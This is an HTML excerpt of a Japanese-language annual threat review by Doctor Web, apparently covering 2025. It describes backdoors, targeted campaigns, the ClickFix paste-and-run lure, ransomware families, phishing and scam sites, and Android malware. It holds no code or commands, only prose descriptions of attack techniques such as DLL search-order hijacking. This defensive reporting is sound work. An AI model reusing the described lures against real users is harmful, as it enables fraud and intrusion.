&lt;p&gt;8月、Doctor Webはロシア企業の従業員を標的とした多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; の拡散について記事を &lt;a href="https://news.drweb.co.jp/show/?i=15047&amp;lng=ja" target="_blank"&gt;公開しました&lt;/a&gt;。このマルウェアはアンチウイルスに偽装してメッセンジャーのダイレクトメッセージ（DM）から拡散され、標的デバイスを感染させた後は機密情報を収集するほか、攻撃者が被害者をスパイすることを可能にします。&lt;/p&gt;

&lt;p&gt;8月には、ロシアの機械工学系企業を狙ったScaly Wolfグループによる標的型攻撃に関する調査レポートも&lt;a href="https://news.drweb.co.jp/show/?i=15046" target="_blank"&gt;公開しています&lt;/a&gt;。この攻撃では複数の悪意のあるツールが用いられており、そのうちメインとなるものの1つがモジュール型バックドアUpdatarでした。Updatarは攻撃者が感染させたコンピューターから機密データを収集することを可能にします。&lt;/p&gt;

&lt;p&gt;10月、Doctor WebのエキスパートはメッセンジャーアプリTelegram Xの改変版に埋め込まれたバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を発見しました。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; はTelegramアカウントからログインIDとパスワードをはじめとする機密データを窃取します。また、脅威アクターがユーザーのアカウントとメッセンジャー自体の両方を完全にコントロールし、ユーザーに成り代わってさまざまな操作を密かに実行することを可能にします。たとえば、ユーザーをTelegramチャンネルに参加・退出させたり、特定のチャットや新規認証済みデバイスを非表示にしたりすることができます。&lt;/p&gt;

&lt;p&gt;11月、Doctor Webはハッカー集団「Cavalry Werewolf」によるロシア政府機関を狙った標的型攻撃について調査レポートを&lt;a href="https://news.drweb.co.jp/show/?i=15078&amp;lng=ja" target="_blank"&gt;公開しました&lt;/a&gt;。この調査において、Doctor WebのエキスパートはCavalry Werewolfが攻撃キャンペーンで使用していた多数の悪意のあるツールを特定することに成功しています。それらのツールにはオープンソースツールも含まれていました。Cavalry Werewolfの特徴についても調査が行われ、リバースシェルバックドアを好んで使用していること、感染させたコンピューターの操作にTelegram APIを頻繁に使用していることが明らかになりました。また、この攻撃は政府機関を騙って送信されるフィッシングメールから始まっており、これらのメールにさまざまな公文書を装ったマルウェアが添付されていました。&lt;/p&gt;

&lt;p&gt;12月、Doctor Webは人間になりすましてサイトの人気度を人為的に高めるマルウェア&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.ChimeraWire&amp;lng=ja"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; に関する調査結果を&lt;a href="https://news.drweb.co.jp/show/?i=15090&amp;lng=ja" target="_blank"&gt;公開しました&lt;/a&gt;。このトロイの木馬は悪意のあるアクターから受け取ったパラメータに従って、検索エンジンGoogleとBing内で目的のサイトを探してそれらを開き、そのサイト上でユーザーの操作を模倣してクリックを実行します。&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.ChimeraWire&amp;lng=ja"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; はDLL検索順序ハイジャッキング脆弱性を悪用する複数の悪意のあるダウンローダによってコンピューターにインストールされます。&lt;/p&gt;

&lt;p&gt;2025年にはClickFix手法を用いた攻撃が急増しました。この攻撃はソーシャルエンジニアリングの一種で、攻撃者がユーザーを巧妙に操りデバイス上で悪意のあるコードを実行させるというものです。ユーザーが侵害されたサイトや偽サイトにアクセスすると、ブラウザのエラーによりWebページを正しく表示できない、あるいは更新が必要であるなどと通知する警告メッセージが表示され、問題を「修正（fix）」するよう誘導されます。攻撃の種類によって、ユーザーはWebページ上に表示されている文字列をコピーするか、またはただ単に該当するボタン（「更新」、「修正」など）をクリックするよう指示されます。後者の場合、攻撃者が必要とする内容（悪意のあるコードなど）は自動的にクリップボードにコピーされます。続けて、ユーザーはコマンドラインまたはPowerShellターミナルを起動し、そこにクリップボードの内容を貼り付けてキーボードの「Enter」キーを押すよう促されます。こうして、被害者は自らの手で悪意のあるコードを実行する格好となり、ここから感染チェーンが開始されます。ClickFix攻撃の詳細については&lt;a href="https://news.drweb.co.jp/show/?i=15074&amp;lng=ja" target="_blank"&gt;こちらの記事&lt;/a&gt;をご覧ください。&lt;/p&gt;

&lt;h3&gt;マルウェアに関する状況&lt;/h3&gt;

&lt;p&gt;Dr.Webアンチウイルス製品の検出統計によると、2025年に検出された脅威の合計数は2024年と比較して5.45%増加し、一方でユニークな脅威の数は15.89%減少しています。最も多く検出された脅威はさまざまな悪意のあるスクリプトとアドウェア型トロイの木馬となり、別の悪意のあるアプリを起動させるトロイの木馬も多く検出されました。また、AutoItスクリプト言語で書かれたトロイの木馬による攻撃も引き続き確認されています。このトロイの木馬は別のマルウェアと一緒に拡散されて、それらの検出を困難にするよう設計されています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;span class="string"&gt;mode extensions&lt;/span&gt;、&lt;span class="string"&gt;разработчика&lt;/span&gt;、&lt;span class="string"&gt;розробника&lt;/span&gt; というテキストを含むウィンドウを無限ループで検索し、Escapeキー押下イベントを送信してそれらを強制的に閉じる悪意のあるスクリプトです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;WinSafeブラウザ拡張機能の悪意のあるコンポーネントの検出名です。このコンポーネントはブラウザに迷惑な広告を表示させるJavaScriptファイルです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;マルウェア &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.AutoIt.289&amp;lng=ja"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; とそのコンポーネントを起動する悪意のあるXMLスクリプトの検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=JS.Siggen5.44590&amp;lng=ja"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;パブリックJavaScriptライブラリes5-ext-mainに追加される悪意のあるコードです。タイムゾーン設定がロシア国内のものになっているサーバーにパッケージがインストールされた場合に、特定のメッセージを表示します。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;脅威アクターによって改変されたElectronフレームワークのホストプロセスの検出名です。Steamアプリケーションのコンポーネント（Steam Client WebHelper）に偽装し、JavaScriptバックドアをロードします。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;さまざまな悪意のあるプログラムによってC2サーバーへの接続に使用される悪意のあるスクリプトです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;感染したシステムにさまざまなマイニング型トロイの木馬やアドウェアをダウンロードするよう設計された、Go言語で記述されたトロイの木馬です。このマルウェアは &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt; に置かれるDLLファイルで、Torrentクライアント「uTorrent」のDLL検索順序ハイジャッキング（DLL Search Order Hijacking）脆弱性を悪用することで起動します。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;2025年にメールトラフィック内で最も多く検出された脅威は、別のマルウェアをダウンロードしてインストールするトロイの木馬となっています。また、さまざまなバックドア、エクスプロイト、フィッシングドキュメント、そして悪意のあるスクリプトも拡散されました。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Microsoft Officeドキュメントの脆弱性を悪用するダウンローダ型トロイの木馬のファミリーです。感染させたコンピューターに別の悪意のあるプログラムをダウンロードすることもできます。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Microsoft Officeソフトウェアの脆弱性を悪用し、攻撃者が任意のコードを実行できるようにするエクスプロイトです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;フィッシングページを生成する悪意のあるJavaScriptスクリプトです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;機密情報を窃取するよう設計されたスパイウェアです。ブラウザやメッセンジャー、メールクライアント、データベースなどといった多くのプログラムからログインIDとパスワードを収集して攻撃者に送信します。また、クリップボードの内容を盗み、キーロガー機能を備え、スクリーンショットを撮ることも可能です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Windows実行ファイルを感染させるファイルウイルスです。さまざまなプログラムのパスワードを窃取することを主な目的としています。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;疑わしい名前のJavaScriptを含むZIPアーカイブのヒューリスティック検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;パッカーで保護されたマルウェアの検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;AutoItスクリプト言語で記述された悪意のあるアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.AutoIt.289&amp;lng=ja"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; の、パックされたバージョンの検出名です。マイニング型トロイの木馬やバックドア、自己増殖型モジュールなど複数の悪意のあるアプリグループの一部として拡散されます。&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.AutoIt.289&amp;lng=ja"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; はメインのペイロードの検出を困難にする、さまざまな悪意のある動作を実行します。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;暗号化ランサムウェア&lt;/h3&gt;

&lt;p&gt;2025年には、ランサムウェア型トロイの木馬に感染したユーザーからDoctor Webのテクニカルサポートに寄せられるファイルの復号化リクエスト数に2024年と比較して35.98%の減少がみられました。以下のグラフは2025年におけるリクエスト数の推移を表しています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年に最も多く検出されたランサムウェア：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;（リクエストの23.22% ）&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Mimicとしても知られるランサムウェアです。Windowsコンピューター上のファイルを高速で検索できる正規ソフトウェア「Everything」の &lt;span class="string"&gt;everything.dll&lt;/span&gt; ライブラリを使用します。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;（リクエストの3.33% ）&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;ランサムウェアContiのソースコードを基にしたランサムウェア型トロイの木馬です。ChaCha20アルゴリズムを使用してファイルを暗号化します。脅威アクターのC2サーバー数台を停止させることに成功し、RSA暗号の秘密鍵が公開されたことで、現在ではこのトロイの木馬の一部の亜種によって暗号化されたファイルを復号化することが可能です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;（リクエストの2.50% ）&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Macopとしても知られるランサムウェア型トロイの木馬です（&lt;b&gt;Trojan.Encoder.30572&lt;/b&gt; はこのトロイの木馬のまた別の亜種の１つです）。サイズは30～40KB程度と小さく、トロイの木馬にサードパーティの暗号化ライブラリが組み込まれておらず、暗号化とキーの生成にCryptoAPIのみを使用するということがその一因となっています。ファイルの暗号化にはAES-256アルゴリズムを使用し、キー自体はRSA-1024を使用して暗号化されます。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;（リクエストの2.31%）&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;そのアーティファクトから、ハッカー集団「C77L」が作成に関わっていることが示されているランサムウェアです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;（リクエストの2.13% ）&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;複数のバージョンを持つランサムウェア型トロイの木馬です。現在の亜種はAES-256+RSAアルゴリズムを使用してファイルを暗号化します。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;インターネット詐欺&lt;/h3&gt;

&lt;p&gt;2025年には、メッセンジャーアプリTelegramのユーザーアカウントを盗むフィッシングサイトの増加がDoctor Webのインターネットアナリストによって確認されました。悪意のあるアクターは偽の認証画面や、利用規約違反について通知してアカウントの確認を行うよう求めるTelegramサポートを装った偽のメッセージなどといったさまざまな手口を用いています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;利用規約違反について通知してTelegramアカウントの確認を行うよう求めるフィッシングサイトの例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;ゲームプラットフォームやオンラインストアなど他のサービスのユーザーを標的にした同様のサイトも発見されています。これらの偽サイトは正規サイトとそっくりな外観で、アカウントにログインするようユーザーを誘導します。罠にかかったユーザーは機密情報を攻撃者に渡してしまうことになります。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;アカウント名とパスワードを入力するためのフィッシングフォームを表示させる、ゲームプラットフォーム「Steam」の偽サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;あらゆる種類のギフトやボーナス、あるいは「お得なプロモーション」を提供する詐欺サイトも引き続きさまざまなものが出現しています。ロシアで多く見られたのは、賞品の抽選に参加できるとうたってユーザーを誘う偽のマーケットプレイスサイトでした。これらのサイトでは必ずユーザーが「当選」するようプログラムされており、当選後は賞品を受け取るためにまず税金を、そして次は送料、その次は保険料、などといった具合に次から次へと支払いを要求してきます。賞品の在庫がないため代わりに現金で受け取ることができるとユーザーに提案するバージョンも確認されていますが、この場合も同様に手数料や保険料などと称して支払いを要求されます。最終的に被害者が賞品を受け取ることはありません。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;「賞品の抽選」に参加できると誘う偽のマーケットプレイスサイトの例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;同様の手口の1つに、英国のユーザーを標的とした公共交通機関の偽サイトがあります。交通系ICカードの「限定版」が当たるゲームに参加するようユーザーを誘うというもので、記念バージョンであるこれらの限定版ICカードを使用すれば対象となる公共交通機関を無料で利用できるとうたっています。ユーザーは必ず「当たり」を引くようになっていますが、獲得したカードを「受け取る」ために個人情報を提供して少額の手数料を支払うよう求められます。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;公共交通機関を装い、交通系ICカードが当たる抽選に参加するよう誘う詐欺サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;金融関連の詐欺サイトも依然としてあらゆるものが横行しています。なかでも詐欺師の間で揺るがぬ人気を誇っているのが、独自のアルゴリズムや人工知能（AI）に基づく自動システムを活用した市場取引で利益を得ることができると主張する詐欺サイトです。あらゆる国のユーザーを標的としたものが観測されており、その多くは「リクエスト」申請や「アカウント」登録のためと称して個人情報を要求します。提供された情報は攻撃者の手に渡り、後に転売されたり、ユーザーをさらなる偽の投資サービスに誘い込み「取引」アカウントに入金するよう誘導したりする目的で使用される可能性があります。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Apple 社と関連があるとうたい、AIを活用した「投資プラットフォーム」へのアクセスを提供する詐欺サイトの例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;こうしたサイトのなかには、特定の企業の「バーチャルアシスタント」や「社員」を装った詐欺師との偽のチャットという似たようなテンプレートを使用するものが多くみられます。ユーザーはチャット内でいくつかの質問に回答して個人情報を提供するよう求められます。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;フランスのユーザーを標的としたサイトの1つ：架空の自動取引ソフトウェア「TraderAI」へのアクセスを提供し、このソフトウェアを使用することで3,500ユーロから始めて高額の収入を得ることができるとうたっている&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;メッセージングアプリTelegram 内で取引を行うことができる投資サービスを宣伝するサイトも確認されています。このサイトでは、グローバル企業の株を「スマートフォンのブラウザ内で直接」自動売買して月に1万ユーロを稼ぐことができると約束しています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;株を自動売買するという「Telegramプラットフォーム」に参加するよう誘う詐欺サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Telegram、WhatsApp、TikTokなどの大手企業やサービスが開発に関わっているとする「取引ボット」を使用してお金を稼ぐことができると主張する詐欺サイトもありました。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;WhatsAppと関連があるとする架空の取引ボットを活用するようユーザーを誘うサイトの例 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;2025年を通して、ロシアやCIS（独立国家共同体）、欧州諸国を含む多くの国のユーザーを標的に石油・ガス部門への投資を勧める新たな詐欺サイトが発見されています。これらのサイトでも、多くの場合ユーザーは氏名や携帯電話番号、メールアドレスなどといった個人情報を提供するよう要求されます。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;キルギスのユーザーを標的に「石油・ガス取引で儲け」て大きな利益を得ることができると約束する詐欺サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;給付金や補助金などの「政府支援」を約束する詐欺サイトも依然として後を絶ちません。ロシアのユーザーを標的としたものでは、ロシア政府ポータルサイト（Gosuslugi）と関連があるとうたう詐欺サイトが主流となっています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;ロシア政府ポータルサイト（Gosuslugi）と関連があるとうたい、政府と大手石油・ガス会社からの安定した支払いを約束する詐欺サイトの例：この給付金プログラムに「参加」するためにユーザーは個人情報を提供するよう求められる&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;教育関連を装った詐欺サイトにも新たなものが出現しています。金融リテラシーを向上させたり、特定の職業のスキルを習得したりするためのさまざまな教育・トレーニングコースを提供するサイトが観測されました。他の手口と同様、これらのサイトでもユーザーはトレーニングに「アクセス」するために個人情報を提供するよう要求されます。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;英語学習を提供する詐欺サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;2025年には、劇場チケットを販売するという新たな詐欺サイトが登場しました。こうしたサイトではチケットを割引価格で提供していますが、購入代金を支払ったユーザーがチケットを受け取ることはありません。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;存在しない劇場チケットを販売する詐欺サイトの1つ&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;そのほか、映画チケットを販売するプライベートシアターの偽サイトも多くみられるようになりました。これらのサイトでも支払った購入代金は詐欺師の手に渡り、被害者がチケットを受け取ることはありません。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;プライベートシアターの偽サイト&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;モバイルデバイス&lt;/h3&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年には広告を表示させるトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; と &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;、そしてうたわれた機能を実行する代わりにさまざまなWebサイト（詐欺サイトや悪意のあるサイトを含む）を開く偽アプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; が最も多く検出されたAndroidマルウェアとなりました。サイバー犯罪者によってAndroidデバイスのファームウェアに埋め込まれる多機能トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; の活動も増加しています。バンキング型トロイの木馬については、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; Android.Bankerによる攻撃が増加する一方で、&lt;b&gt;Android.SpyMax&lt;/b&gt; の活動は減少しています。&lt;/p&gt;

&lt;p&gt;2025年にも、マルウェア作成者は悪意のあるAndroidアプリを解析や検出から保護しようとあらゆるテクニックを駆使し続けています。そのうちの1つにDEXコードをCコードに変換するという手法がありました（DCCとも呼ばれます）。&lt;/p&gt;

&lt;p&gt;最も多く検出された望ましくないアプリケーションは &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; となりました。これらはさまざまなタスクを完了することで仮想報酬を得ることができるとうたうアプリで、この報酬は現金化できるとされていますが実際にユーザーがお金を受け取ることはありません。また、&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; と &lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; も多く検出されています。&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; はアンチウイルスの動作を模倣して存在しない脅威の検出を通知し、検出された問題を「修復」するために製品の完全版を購入するよう促すアプリです。&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; はクラウドサービスCloudInjectを使用して改造されたアプリで、その改造過程で危険なシステム権限や難読化されたコードが追加されます。その目的を改造者はコントロールすることができません。&lt;/p&gt;

